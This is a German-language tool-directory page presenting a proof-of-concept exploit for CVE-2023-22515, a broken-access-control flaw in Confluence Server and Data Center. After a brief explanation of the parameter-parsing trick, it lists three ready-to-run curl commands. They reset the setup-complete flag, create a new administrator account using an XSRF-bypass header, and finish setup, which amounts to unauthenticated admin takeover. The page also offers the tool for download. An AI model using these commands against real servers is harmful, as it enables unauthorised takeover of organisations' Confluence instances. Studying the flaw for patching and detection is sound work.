Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-22515-POC — Proof-of-Concept-Exploit für CVE-2023-22515, eine kritische Schwachstelle in der Zugriffskontrolle in Confluence Server und Data Center, die eine nicht authentifizierte Übernahme des Administratorkontos ermöglicht. | Kitploit
Tools/GitHubGitHub/j3seer/cve-2023-22515-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsRed Teaming
GitHubj3seer/cve-2023-22515-poc

CVE-2023-22515-POC

Proof-of-Concept-Exploit für CVE-2023-22515, eine kritische Schwachstelle in der Zugriffskontrolle in Confluence Server und Data Center, die eine nicht authentifizierte Übernahme des Administratorkontos ermöglicht.

Repository anzeigen
824vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-22515

CVE-2023-22515, eine kritische Schwachstelle, die On-Premises-Instanzen von Confluence Server und Confluence Data Center betrifft, eine Schwachstelle mit nicht ordnungsgemäßer Zugriffskontrolle (Broken Access Control). Attlassian hat einen CVSS-Basisscore von 10,0 vergeben.

Exploit

Kurze Erklärung:

1- Aufgrund der Art und Weise, wie Xwork-Interceptor Parameter parsen, entspricht /test.action?one=a dem Aufruf setOne()='a', alternativ entspricht /test.action?one.two=a dem Aufruf getOne().setTwo()="a".

2- Die Endpunkte /setup/* enthalten einen @ParameterSafe-Aufruf, der uns die Verwendung von set und ermöglicht, wie z. B. bei . Da die -Endpunkte jedoch blockiert sind, weil das Setup abgeschlossen ist, kann verwendet werden.

get
/setup/setupdb.action?dbConfigInfo.databaseType=postgresql
/setup/*
/server-info.action

3- Finde die Setter-Methode für den Abschluss des Setups => getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false);

4- Verwende den "X-Atlassian-Token"-Header, um XSRF zu umgehen.

root@kitploit:~
curl http://localhost/server-info.action\?bootstrapStatusProvider.applicationConfig.setupComplete\=false\; 

curl -X POST -H "X-Atlassian-Token: no-check" -d "username=haxor&fullName=leet&[email protected]&password=leet&confirm=leet&setup-next-button=Next" http://localhost/setup/setupadministrator.action\; 

curl -X POST -H "X-Atlassian-Token: no-check" http://localhost/setup/finishsetup.action

Referenzen

Haftungsausschluss: Der Exploit wurde nicht von mir entdeckt oder erstellt. Die Anerkennung geht an die untenstehenden Artikel.

https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis

https://blog.s1r1us.ninja/research/brokenconflu

Tool herunterladen